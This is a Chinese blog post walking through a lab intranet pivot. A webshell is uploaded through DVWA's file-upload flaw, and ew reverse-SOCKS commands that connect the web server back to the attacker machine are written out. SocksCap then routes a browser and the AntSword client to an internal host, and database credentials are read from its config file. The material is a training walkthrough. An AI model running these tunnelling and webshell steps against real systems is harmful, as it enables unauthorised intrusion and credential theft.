内网渗透初探(一)

背景:

攻击机IP:192.168.0.4

web服务器IP:192.168.0.217和10.1.0.5

内网机器IP:10.1.0.4

目标:拿到内网机器10.1.0.4的webshell

注意:

1.攻击机可以直接ping通192.168.0.217,但是无法ping通10.1.0.5

2.攻击机无法ping通10.1.0.4

工具:

中国蚁剑,浏览器,ew,SocksCap

 

步骤一:

拿到web服务器的webshell,这里使用的是dvwa上传漏洞直接上传。

步骤二:将web服务器作为代理机(跳板机)

首先需要将ew工具上传至web服务器

攻击机输入命令:ew_for_Win.exe -s rcsocks -l 1008 -e 888

web服务器输入命令:ew_for_Win.exe -s rssocks -d 192.168.0.4 -e 888

建立完成之后会发现下图框中的内容

步骤三:渗透内网机器10.1.0.4

为了作为对比,首先在无代理的情况下浏览器访问10.1.0.4,可以发现无法访问

然后使用SocksCap进行代理设置:127.0.0.1     1008    socks5

然后检测代理是否成功:

添加浏览器到代理程序中,并打开

访问10.1.0.4

然后继续利用dvwa的上传漏洞上传webshell

将中国蚁剑添加进代理软件程序中,并打开,然后添加webshell

可以直接访问dvwa的配置文件,获取数据库信息

然后利用中国蚁剑的数据库功能,可以看到数据库是root权限

完成本次渗透!

发表评论

电子邮件地址不会被公开。 必填项已用*标注